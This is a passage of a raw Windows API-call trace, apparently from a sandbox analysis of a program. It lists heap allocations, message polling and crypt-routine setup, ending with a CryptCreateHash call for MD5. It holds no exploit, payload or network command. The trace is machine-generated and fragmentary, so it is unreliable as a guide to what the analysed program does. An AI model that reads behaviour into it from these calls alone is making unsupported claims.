hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0231.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0231.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.610] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0231.610] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0231.610] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0231.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0231.611] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.611] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0231.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0231.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0231.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0231.612] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0231.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0231.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0231.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0231.612] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0231.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.613] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.613] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0231.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0231.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0231.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0231.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0231.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0231.614] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0231.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0231.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0231.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0231.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.616] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0231.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0231.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.616] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0231.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.617] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0231.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0231.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0231.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0231.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.617] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0231.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.618] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.618] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0231.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0231.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.618] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0231.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51478, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0231.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.618] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0231.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.619] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0231.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0231.619] RtlAllocateHeap (HeapHandle=0x970000, 